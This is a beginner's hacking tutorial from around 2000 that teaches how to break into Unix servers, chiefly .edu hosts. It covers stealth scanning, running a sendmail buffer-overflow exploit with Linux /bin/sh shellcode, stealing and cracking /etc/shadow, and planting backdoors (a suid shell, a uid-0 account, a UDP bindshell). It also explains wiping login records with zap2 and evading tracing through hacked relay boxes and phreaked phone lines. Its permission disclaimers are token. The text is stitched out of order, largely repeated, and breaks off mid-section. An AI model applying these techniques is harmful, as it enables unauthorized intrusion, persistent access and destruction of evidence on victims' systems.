for technical support or buy new hardware, just install it as you can.
This is really important! READ THE MANUAL, or even buy a UNIX book.
Books about TCP/IP and C programming are also useful.
If you don't, you won't understand some things i'll explain later. And, of course, you'll
never become a hacker if you don't read a lot of that 'literature'.
the Internet
~~~~~~~~~~~~
Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
You want to hack internet boxes! So lets connect to the internet.
Yes, i know you've gotten this document from the internet, but that was with windoze
and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
You're a Linux user, and you gotta open your way to the Internet.
You gotta make your Linux box to connect to the net,
so go and set up your modem (using YaST2 in SuSE).
Common problems:
If your box doesn't detect any modems, that probably means that you have no modem installed
:-D (not a joke!).
Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are
specifically designed to work ONLY on windoze. Don't blame linux, this happens because the
winmodem has not a critical chip that makes it work. It works on windoze cause the vendor
driver emulates that missing chip. And hat vendor driver is only available for windoze.
ISA and external modems are more probably real modems, but not all of them.
If you want to make sure wether a modem is or not a winmodem, visit http://start.at/modem.
Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)
NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect the
internet with aol. You can't hack with aol. i don't like aol. aol sucks.
Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,
leave aol and get a real ISP. Then you'll be forgiven.
Don't get busted
~~~~~~~~~~~~~~~~
Let's suppose you haven't skipped everything below and your Linux bow is now connected to the net.
It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be safe.
- Don't hack
this is the most effective stealth technique. not even the FBI can bust you. :-)
If you choose this option, stop reading now, cause the rest is worthless and futile.
- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find
your own website oe email address, find your ISP, your phone number, your home...
and you get busted!!
- be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.
NEVER tell others you've hacked a box.
- NEVER hack directly from your box (your_box --> victim's box).
Always use a third box in the middle (your_box --> lame_box --> victim's box).
Where lame_box is a previously hacked box or...a shell account box!
A shell account is a service where you get control of a box WITHOUT hacking it.
There are a few places where shell accounts are given for free. One of them is nether.net.
- Don't hack dangerous boxes until you're a real hacker.
Which boxes are dangerous:
Military boxes
Government boxes
Important and powerful companies' boxes
Security companies' boxes
Which boxes are NOT dangerous:
Educational boxes (any .edu domain)
Little companies' boxes
Japanese boxes
- Always connect to the internet through a free and anonymous ISP
(did i tell you that AOL is NOT an ISP?)
- Use phreking techniques to redirect calls and use others' lines for your ISP call.
Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.
TCP ports and scanning
~~~~~~~~~~~~~~~~~~~~~~
Do you got your stealth linux box connected to the internet (not aol)?
Have you read the manual as i told you?
Then we shall start with the damn real thing.
First of all, you should know some things about the internet. It's based on the TPC/IP protocol,
(and others)
It works like this: every box has 65k connection PORTS. some of them are opened and waiting for
your data to be sent.
So you can open a connection and send data to any these ports. Those ports are associated with
a service:
Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs
on the box, opens its port and offers their damn service.
here are some common ports and their usual services (there are a lot more):
Port number Common service Example daemon (d stands for daemon)
21 FTP FTPd
23 Telnet telnetd
25 SMTP sendmail (yes!)
80 HTTP apache
110 POP3 qpop
Example:
when you visit the website http://www.host.com/luser/index.html, your browser does this:
-it connects to the TCP port 80
-it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'
(it really sends a lot of things more, but that is the essential)
-the host sends the html file
The cool thing of daemons is they have really serious security bugs.
That's why we want to know what daemons are running there, so...
We need to know what ports are opened in the box we want to hack.
How could we get that information?
We gotta use a scanner. A scanner is a program that tries to
connect to every port on the box and tells which of them are opened.
The best scanner i can think of is nmap, created by Fyodor.
You can get nmap from my site in tarball or rpm format.
Let's install nmap from an .rpm packet.
bash-2.03$ rpm -i nmap-2.53-1.i386.rpm
then we run it:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
Nmap has told us which ports are opened on target.edu and thus, what services it's offering.
I know, i said telnet is a service but is also a program (don't let this confuse you).
This program can open a TCP connection to the port you specify.
So lets see what's on that ports.
On your linux console, type:
bash-2.03$ telnet target.edu 21
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu FTP server (SunOS 5.6) ready.
quit
221 Goodbye.
Connection closed by foreign host.
You see?
They speak out some valuable information:
-their operating system is SunOS 5.6
-their FTP daemon is the standard provided by the OS.
bash-2.03$ telnet target.edu 25
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0
400 (EDT)
quit
221 2.0.0 target.edu closing connection
Connection closed by foreign host.
They like to tell us everything:
-their SMTP daemon is sendmail
-its version is 8.11.0/8.9.3
Experiment with other ports to discover other daemons.
Why is this information useful to us? cause the security bugs that can let us in depend
on the OS and daemons they are running.
But there is a problem here... such information can be faked!
It's difficult to really know what daemons are they running, but we can know FOR SURE
what's the operating system:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3
TCP Sequence Prediction: Class=random positive increments
Difficulty=937544 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.14
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!
We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
but the information we've already gathered should be enough.
This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
what's the OS there and its very difficult to avoid it.
Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
you their difficulty is low, that means their TCP sequence is predictable and we
can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.
Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
And we don't want the admins to get angry with us, that's why we used the -sS option.
This way (most) hosts don't detect ANYTHING from the portscan.
Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
usage of nmap's features, read its man page:
bash-2.03$ man nmap
How to upload and compile programs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The most obvious and simple way is using FTP:
bash-2.03$ ls
program.c
sh-2.03$ ftp target.edu
Connected to target.edu.
220 target.edu FTP server (SunOS 5.6) ready.
Name: luser
331 Password required for luser.
Password:
230 User luser logged in.
ftp> put program.c
200 PORT command successful.
150 ASCII data connection for program.c (204.42.253.18,57982).
226 Transfer complete.
ftp> quit
221 Goodbye.
But this is not a really good way. It can create logs that will make the admin to detect us.
Avoid uploading it with FTP as you can, use cut&paste instead.
Here's how to make it:
we run a text editor
sh-2.03$ pico exploit.c
if it doesn't work, try this one:
sh-2.03$ vi exploit.c
Of course, you must learn how to use vi.
Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x,
ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut the
text from it. Change to your target and paste the code so you've 'uploaded' the file.
To cut a text from the screen, you need to install the gpm packet from your linux distribution.
This program lets you select and cut text with your mouse.
If cut&paste doesn't work, you can also type it by hand (they aren't usually large).
Once you get the .c file there, here's how to compile:
sh-2.03$ gcc program.c -o program
and execute:
sh-2.03$ ./program
Exploiting vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~
This is the most important part of our hacking experience. Once we know what target.edu
is running, we can go to one of those EXPLOIT databases that are on the net.
A exploit is a piece of code that exploits a vulnerability on its software. In the case of
target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easy
exploitable. If your target gots an old version, you'll probably get in easyly.
When we exploit a security bug, we can get:
- a normal shell (don't know what a shell is? read a book of unix!)
a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
this one lets us send commands to the box, but we got limited priviledges.
- a root shell
this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.
These are some exploit databases i suggest you to visit:
www.hack.co.za
www.r00tabega.org
www.rootshell.com
www.securityfocus.com
www.insecure.org/sploits.html
Every exploit is different to use, so read its text and try them.
They usually come in .c language.
The most standar and easy to use exploits are buffer overflows.
I won't explain here how a buffer overflow does work,
Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.
You can download it from my site. (www.3b0x.com)
Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
is different to every OS, so this is a strong reason to know what OS they're running.
We edit the .c file we've downloaded and look for something like this:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.
You gotta replace it by the shellcode for the OS your target is running.
You can find shellcodes for most OSes on my site or create your own by reading
the text i mentioned before (Smash The Stack For Fun And Profit).
IMPORTANT: before continuing with the practice, ask your target for permission to hack them.
if they let you do it, then you shall continue.
if they don't give you permission, STOP HERE and try with another one.
shall you continue without their permission, you'd be inquiring law and
i'm not responible of your craziness in any way!!!
You should have now the shell account, this is the time to use it!
everything i explain on this section, do it through your shell account:
bash-2.03$ telnet myshellaccount 23
Trying xx.xx.xx.xx...
Connected to yourshellaccount.
Escape character is '^]'.
Welcome to yourshellaccount
login: malicioususer
Password: (it doesn't display)
Last login: Fry Sep 15 11:45:34 from.
sh-2.03$
Here is a example of a buffer overflow (that doesn't really exist):
we compile it:
sh-2.03$ gcc exploit.c -o exploit
we execute it:
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
Sendmail works on port 25, so:
sh-2.03$./exploit 25 target.edu
Cool, '$' means we got a shell! Let's find out if we're root.
$whoami
root
Damn, we've rooted target.edu!
$whyamiroot
because you've hacked me! :-) (just kidding)
There are some exploits that don't give you root directly, but a normal shell.
It depends on what luser is running the daemon. (sendmail is usually root)
Then you'll have to upload a .c file with a local (local means it can't overflow
a daemon, but a local program) overflow and compile it.
Remember to avoid uploading it with FTP as you can.
Other kind of exploit is the one that gives you access to the password file.
If a host gots port 23 (telnet) opened, we can login as a normal user
(remote root logins are usually not allowed) by putting his/hers/its username
and password. Then use the su command to become root.
sh-2.03$ telnet target.edu 23
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
We're running SunOS 5.7
Welcome to target.edu
login: luser
Password: (it doesn't display)
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
sh-2.03$ whoami
luser
Are we lusers?
sh-2.03$ su root
Password:
Don't think so...
sh-2.03$ whoami
root
sh-2.03$
Let's see what happened. We've stolen the password file (/etc/shadow) using an exploit.
Then, let's suppose we've extracted the password from luser and root. We can't login as
root so we login as luser and run su. su asks us for the root password, we put it and...
rooted!!
The problem here is that is not easy to extract a root password from a password file.
Only 1/10 admins are idiot enough to choose a crackable password like a dictinonary word
or a person's name.
I said some admins are idiot (some of them are smart), but lusers are the more most
idiotest thing on a system. You'll find that luser's passwords are mostly easyly cracked,
you'll find that lusers set up rlogin doors for you to enter without a password, etc.
Not to mention what happens when an admin gives a normal luser administrator priviledges
with sudo or something.
To learn how to crack a password file and extract its passwords, download a document called
"cracking UNIX passwords" by Zebal. You can get it from my site (www.3b0x.com).
Of course, I haven't listed all the exploit kinds that exist, only the most common.
Putting backdoors
~~~~~~~~~~~~~~~~~
Ok, we've rooted the system. Then what?
Now you're able to change the webpage of that .edu box. Is that what you want to do?
Notice that doing such a thing is LAMER attitude. everyone out there can hack an .edu
box, but they're not ashaming them with such things.
Hacktivism is good and respected. You can change the page of bad people with bad ideologies
like nazis, scienciologists, bsa.org, microsoft, etc. Not a bunch of poor educators.
REMEMBER: ask for permission first!
No, this time you should do another thing. You should keep that system for you to play with
as a toy! (remember: your_box --> lame_box --> victim's box)
Once we type "exit" on our login shell, we're out. And we gotta repeat all the process to get
back in.
And it may not be possible:
- the admin changed his password to something uncrackable.
- they updated sendmail to a newer version so the exploit doesn't work.
So now we're root and we can do everything, we shall put some backdoors that let us get back in.
It may be interesting to read the paper about backdoors I host on my site. (www.3b0x.com)
Anyway, i'll explain the basics of it.
1.How to make a sushi:
To make a sushi or suid shell, we gotta copy /bin/sh to some hidden place and give it suid
permissions:
sh-2.03$ cp /bin/sh /dev/nul
In the strange case the admin looks at /dev, he wouldn't find something unusual cause
/dev/null does exist (who notices the difference?).
sh-2.03$ cd /dev
sh-2.03$ chown root nul
Should yet be root-owned, but anyway...
sh-2.03$ chmod 4775 nul
4775 means suid, note that "chmod +s nul" wouldn't work on some systems but this works everywhere.
We've finished our 'duty', let's logout:
sh-2.03$ exit
Then, when we come back some day:
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
We're superluser again!
There's one problem: actually most shells drop suid permissions, so the sushi doesn't work.
we'd upload then the shell we want and make a sushi with it.
The shell we want for this is SASH. A stand-alone shell with built-in commands.
This one doesn't drop suid perms, and the commands are built-in, so external commands
can't drop perms too! Remember to compile it for the architecture of the target box.
Do you know where to get sash from? From my site :-). (www.3b0x.com)
2.How to add fake lusers.
You gotta manipulate the users file: /etc/passwd
try this:
sh-2.03$ pico /etc/passwd
if it doesn't work, try this:
sh-2.03$ vi /etc/passwd
Of course, you must learn how to use vi.
This is what a luser line looks like: luser:passwd:uid:gid:startdir:shell
When uid=0 and gid=0, that luser gets superluser priviledges.
Then we add a line like this:
dood::0:0:dood:/:/bin/sh (put it in a hidden place)
So, once we get a shell, we type:
sh-2.03$ su dood
sh-2.03$ whoami
dood
And now we're root because dood's uid=0 and gid=0.
Smart admins usually look for anomalities on /etc/passwd. The best way is to use a fake
program in /bin that executes the shell you want with suid perms.
I haven't got such a program at my site, but it shouldn't be difficult to develope.
3.How to put a bindshell.
A bindshell is a daemon, it's very similar to telnetd (in fact, telnetd is a bindshell).
The case is this is our own daemon. The good bindshells will listen to an UDP port (not TCP)
and give a shell to you when you connect. The cool thing of UDP is this:
If the admin uses a scanner to see what TCP ports are open, he woldn't find anything!
They rarely remember UDP exists.
You can get an UDP bindshell coded by !hispahack from my site.
Cleaning up
~~~~~~~~~~~
Remember when we logedin to target.edu as luser, and used su to become root?
Take a look to this line:
Last login: Fry Sep 22 20:47:59 from xx.xx.xx.xx.
Yes, that was displayed by the target box when we logedin there.
It refers to the last login that the real luser did.
So, what will be displayed when luser logsin again?
Last login: Sun Sep 24 10:32:14 from.
Then luser writes a mail to the admin:
"It has happen some strange thing, when I loggedin today, I've read a line like this:
Last login: Sun Sep 24 10:32:14 from.
Does it mean I did login yesterday? It can't be, I don't work on sundays!
I think it's a bug and this is your fault."
The admin responds to luser:
"That wasn't a bug! this line means someone acceded the system using your password, don't
worry for that, we got his IP. That means we can ask his ISP what phone number did call
at 10:32 and get. Then we shall call the police and he'll get busted"
So you'll get busted because luser was a bit clever (sometimes happens).
So we gotta find a way to delete that.
This information can be stored in:
/usr/adm/lastlog
/var/adm/lastlog
/var/log/lastlog
and we can erase it using lled (get it from my site)
lled gots a buitin help that explains how to use it, remember to chmod the fake file
created by lled like the substitute lastlog file.
There is also some information we'd like to erase:
Remember when i told you not to use FTP? Well, in case you did it, you must now
use wted to clean up. Its sintax is very similar to lled.
you can get it from my site.
The who command shows us (and the admin) which lusers are logedin at the moment.
What if we login and the admin is there?
sh-2.03$ who
root tty1 Sep 25 18:18
Then we shall use zap2. If you loggedin as 'luser', then type:
sh-2.03$ ./zap2 luser
Zap2!
sh-2.03$ who
sh-2.03$
And luser has never been here.
Greetings
~~~~~~~~~
Ok, this is all for now (i'll make a newer version). I hope it has been useful to you and you
decide to continue learning and become a real hacker. You can visit my site (www.3b0x.com)
for more advanced tutorials so you can improve your skills.
I'd get very happy if you send me a mail telling me your impression about this paper (wether
is good or bad), and you help me to improve it.
I'd like to send my greetings to every hacker that has tought me in any way, through newsgroups
or other tutorials like this one. thanks to all.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Introduction
~~~~~~~~~~~~
Hi there, I'm TDC and I'd like to give back all the things i've learnt from the hackers i've
met. I want to write this because most tutorials i've found (very good tutorials) are now
old and don't fit just like they did before. This is why i'm going to teach you and show you
the way to learn to hack.
If you are a hacker, you read this, and find something that's not correct or you don't like,
i want to know. mail me.
I'm sure you'll find a lot of bad-grammars. Don't report them cause I'm not english and
i don't care at all as long as it's understandable.
On this document I talk about many security tools, you can find all them and also contact
me on my site: www.3b0x.com
When you finish reading it, please TELL ME how you like it!
I want to make newer versions of it, check on my site to stay informed.
COPYING: You're welcome to distribute this document to whoever the hell you want, post it
on your website, on forums, newsgroups, etc, AS LONG as you DON'T MODIFY it at all.
If you want to perform it, ask me for permission. thanks a lot!
DISCLAIMER: This document is intended for ludical or educational purposes. I don't want to
promote computer crime and I'm not responible of your actions in any way.
If you want to hack a computer, do the decent thing and ask for permission first.
Let's start
~~~~~~~~~~~
If you read carefully all what i'm telling here, you are smart and you work hard on it,
you'll be able to hack. i promise. That doesn't really make you a hacker (but you're on the way).
A hacker is someone who is able to discover unknown vulnerabilities in software and able to
write the proper codes to exploit them.
NOTE: If you've been unlucky, and before you found this document, you've readen the
guides to (mostly) harmless hacking, then forget everything you think you've learnt from them.
You won't understand some things from my tutorial until you unpoison your brain.
Some definitions
~~~~~~~~~~~~~~~~
I'm going to refer to every kind of computer as a box, and only as a box.
This includes your PC, any server, supercomputers, nuclear silos, HAL9000,
Michael Knight's car, The Matrix, etc.
The systems we're going to hack (with permission) are plenty of normal users, whose
don't have any remote idea about security, and the root. The root user is called
superuser and is used by the admin to administer the system.
I'm going to refer to the users of a system as lusers. Logically, I'll refer to
the admin as superluser.
Operating Systems
~~~~~~~~~~~~~~~~~
Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
or perhaps a mac (motorola) box running macOS.
You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
systems.
This is for two main reasons:
-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
so on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's better
than running it at home?
-all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless
you're running some kind of it.
Let's see where to find the unix you're interested on.
The UNIX systems may be divided in two main groups:
- commercial UNIXes
- free opensource UNIXes
A commercial unix's price is not like windoze's price, and it usually can't run on your box,
so forget it.
The free opensource UNIXes can also be divided in:
- BSD
These are older and difficult to use. The most secure OS (openBSD) is in this group.
You don't want them unless you're planning to install a server on them.
- Linux
Easy to use, stable, secure, and optimized for your kind of box. that's what we need.
I strongly suggest you to get the SuSE distribution of Linux.
It's the best one as i think, and i added here some tips for SuSE, so all should be easier.
Visit www.suse.de and look for a local store or order it online.
(i know i said it the software was free, but not the CDs nor the manual nor the support.
It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)
If you own an intel box, then order the PC version.
If you own a mac box, then order the PowerPC version.
Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.
It's possible you have problem with your hardware on the installation. Read the manual, ask
for technical support or buy new hardware, just install it as you can.
This is really important! READ THE MANUAL, or even buy a UNIX book.
Books about TCP/IP and C programming are also useful.
If you don't, you won't understand some things i'll explain later. And, of course, you'll
never become a hacker if you don't read a lot of that 'literature'.
the Internet
~~~~~~~~~~~~
Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
You want to hack internet boxes! So lets connect to the internet.
Yes, i know you've gotten this document from the internet, but that was with windoze
and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
You're a Linux user, and you gotta open your way to the Internet.
You gotta make your Linux box to connect to the net,
so go and set up your modem (using YaST2 in SuSE).
Common problems:
If your box doesn't detect any modems, that probably means that you have no modem installed
:-D (not a joke!).
Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are
specifically designed to work ONLY on windoze. Don't blame linux, this happens because the
winmodem has not a critical chip that makes it work. It works on windoze cause the vendor
driver emulates that missing chip. And hat vendor driver is only available for windoze.
ISA and external modems are more probably real modems, but not all of them.
If you want to make sure wether a modem is or not a winmodem, visit http://start.at/modem.
Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)
NOTE: Those strange and abnormal online services like aol are NOT ISPs. You cannot connect the
internet with aol. You can't hack with aol. i don't like aol. aol sucks.
Don't worry, we humans are not perfect, and it's probably not your fault. If that is your case,
leave aol and get a real ISP. Then you'll be forgiven.
Don't get busted
~~~~~~~~~~~~~~~~
Let's suppose you haven't skipped everything below and your Linux bow is now connected to the net.
It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be safe.
- Don't hack
this is the most effective stealth technique. not even the FBI can bust you. :-)
If you choose this option, stop reading now, cause the rest is worthless and futile.
- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find
your own website oe email address, find your ISP, your phone number, your home...
and you get busted!!
- be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.
NEVER tell others you've hacked a box.
- NEVER hack directly from your box (your_box --> victim's box).
Always use a third box in the middle (your_box --> lame_box --> victim's box).
Where lame_box is a previously hacked box or...a shell account box!
A shell account is a service where you get control of a box WITHOUT hacking it.
There are a few places where shell accounts are given for free. One of them is nether.net.
- Don't hack dangerous boxes until you're a real hacker.
Which boxes are dangerous:
Military boxes
Government boxes
Important and powerful companies' boxes
Security companies' boxes
Which boxes are NOT dangerous:
Educational boxes (any .edu domain)
Little companies' boxes
Japanese boxes
- Always connect to the internet through a free and anonymous ISP
(did i tell you that AOL is NOT an ISP?)
- Use phreking techniques to redirect calls and use others' lines for your ISP call.
Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.
TCP ports and scanning
~~~~~~~~~~~~~~~~~~~~~~
Do you got your stealth linux box connected to the internet (not aol)?
Have you read the manual as i told you?
Then we shall start with the damn real thing.
First of all, you should know some things about the internet. It's based on the TPC/IP protocol,
(and others)
It works like this: every box has 65k connection PORTS. some of them are opened and waiting for
your data to be sent.
So you can open a connection and send data to any these ports. Those ports are associated with
a service:
Every service is hosted by a DAEMON. Commonly, a daemon or a server is a program that runs
on the box, opens its port and offers their damn service.
here are some common ports and their usual services (there are a lot more):
Port number Common service Example daemon (d stands for daemon)
21 FTP FTPd
23 Telnet telnetd
25 SMTP sendmail (yes!)
80 HTTP apache
110 POP3 qpop
Example:
when you visit the website http://www.host.com/luser/index.html, your browser does this:
-it connects to the TCP port 80
-it sends the string: "GET /HTTP/1.1 /luser/index.html" plus two 'intro'
(it really sends a lot of things more, but that is the essential)
-the host sends the html file
The cool thing of daemons is they have really serious security bugs.
That's why we want to know what daemons are running there, so...
We need to know what ports are opened in the box we want to hack.
How could we get that information?
We gotta use a scanner. A scanner is a program that tries to
connect to every port on the box and tells which of them are opened.
The best scanner i can think of is nmap, created by Fyodor.
You can get nmap from my site in tarball or rpm format.
Let's install nmap from an .rpm packet.
bash-2.03$ rpm -i nmap-2.53-1.i386.rpm
then we run it:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
Nmap has told us which ports are opened on target.edu and thus, what services it's offering.
I know, i said telnet is a service but is also a program (don't let this confuse you).
This program can open a TCP connection to the port you specify.
So lets see what's on that ports.
On your linux console, type:
bash-2.03$ telnet target.edu 21
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu FTP server (SunOS 5.6) ready.
quit
221 Goodbye.
Connection closed by foreign host.
You see?
They speak out some valuable information:
-their operating system is SunOS 5.6
-their FTP daemon is the standard provided by the OS.
bash-2.03$ telnet target.edu 25
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0
400 (EDT)
quit
221 2.0.0 target.edu closing connection
Connection closed by foreign host.
They like to tell us everything:
-their SMTP daemon is sendmail
-its version is 8.11.0/8.9.3
Experiment with other ports to discover other daemons.
Why is this information useful to us? cause the security bugs that can let us in depend
on the OS and daemons they are running.
But there is a problem here... such information can be faked!
It's difficult to really know what daemons are they running, but we can know FOR SURE
what's the operating system:
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop3
TCP Sequence Prediction: Class=random positive increments
Difficulty=937544 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.14
Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
Hey wasn't it SunOS 5.6? Damn they're a bunch of lame fakers!
We know the host is running the Linux 2.x kernel. It'd be useful to know also the distribution,
but the information we've already gathered should be enough.
This nmap feature is cool, isn't it? So even if they've tried to fool us, we can know
what's the OS there and its very difficult to avoid it.
Also take a look to the TCP Sequence Prediction. If you scan a host and nmap tells
you their difficulty is low, that means their TCP sequence is predictable and we
can make spoofing attacks. This usually happens with windoze (9x or NT) boxes.
Ok, we've scanned the target. If the admins detect we've scanned them, they could get angry.
And we don't want the admins to get angry with us, that's why we used the -sS option.
This way (most) hosts don't detect ANYTHING from the portscan.
Anyway, scanning is LEGAL so you shouldn't have any problems with it. If you want a better
usage of nmap's features, read its man page:
bash-2.03$ man nmap
How to upload and compile programs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The most obvious and simple way is using FTP:
bash-2.03$ ls
program.c
sh-2.03$ ftp target.edu
Connected to target.edu.
220 target.edu FTP server (SunOS 5.6) ready.
Name: luser
331 Password required for luser.
Password:
230 User luser logged in.
ftp> put program.c
200 PORT command successful.
150 ASCII data connection for program.c (204.42.253.18,57982).
226 Transfer complete.
ftp> quit
221 Goodbye.
But this is not a really good way. It can create logs that will make the admin to detect us.
Avoid uploading it with FTP as you can, use cut&paste instead.
Here's how to make it:
we run a text editor
sh-2.03$ pico exploit.c
if it doesn't work, try this one:
sh-2.03$ vi exploit.c
Of course, you must learn how to use vi.
Then open another terminal (i mean without x windows, CTRL+ALT+Fx to scape from xwindows to x,
ALT+Fx to change to another terminal, ALT+F7 to return xwindows) on your own box and cut the
text from it. Change to your target and paste the code so you've 'uploaded' the file.
To cut a text from the screen, you need to install the gpm packet from your linux distribution.
This program lets you select and cut text with your mouse.
If cut&paste doesn't work, you can also type it by hand (they aren't usually large).
Once you get the .c file there, here's how to compile:
sh-2.03$ gcc program.c -o program
and execute:
sh-2.03$ ./program
Exploiting vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~
This is the most important part of our hacking experience. Once we know what target.edu
is running, we can go to one of those EXPLOIT databases that are on the net.
A exploit is a piece of code that exploits a vulnerability on its software. In the case of
target.edu, we should look for an adequate exploit for sendmail 8.11.0 or any other daemon
that fits. Note that sendmail is the buggiest and the shittiest daemon, thus the most easy
exploitable. If your target gots an old version, you'll probably get in easyly.
When we exploit a security bug, we can get:
- a normal shell (don't know what a shell is? read a book of unix!)
a shell is a command interpreter. for example, the windoze 'shell' is the command.com file.
this one lets us send commands to the box, but we got limited priviledges.
- a root shell
this is our goal, once we're root, we can do EVERYTHING on our 'rooted' box.
These are some exploit databases i suggest you to visit:
www.hack.co.za
www.r00tabega.org
www.rootshell.com
www.securityfocus.com
www.insecure.org/sploits.html
Every exploit is different to use, so read its text and try them.
They usually come in .c language.
The most standar and easy to use exploits are buffer overflows.
I won't explain here how a buffer overflow does work,
Read "Smash The Stack For Fun And Profit" by Aleph One to learn it.
You can download it from my site. (www.3b0x.com)
Buffer overflows fool a program (in this case sendmail) to make it execute the code you want.
This code usually executes a shell, so it's called 'shellcode'. The shellcode to run a shell
is different to every OS, so this is a strong reason to know what OS they're running.
We edit the .c file we've downloaded and look for something like this:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
This is a shellcode for Linux. It will execute /bin/sh, that is, a shell.
You gotta replace it by the shellcode for the OS your target is running.
You can find shellcodes for most OSes on my site or create your own by reading
the text i mentioned before (Smash The Stack For Fun And Profit).
IMPORTANT: before continuing with the practice, ask your target for permission to hack them.
if they let you do it, then you shall continue.
if they don't give you permission, STOP HERE and try with another one.
shall you continue without their permission, you'd be inquiring law and
i'm not responible of your craziness in any way!!!
You should have now the shell account, this is the time to use it!
everything i explain on this section, do it through your shell account:
bash-2.03$ telnet myshellaccount 23
Trying xx.xx.xx.xx...
Connected to yourshellaccount.
Escape character is '^]'.
Welcome to yourshellaccount
login: malicioususer
Password: (it doesn't display)
Last login: Fry Sep 15 11:45:34 from
sh-2.03$
Here is a example of a buffer overflow (that doesn't really exist):
we compile it:
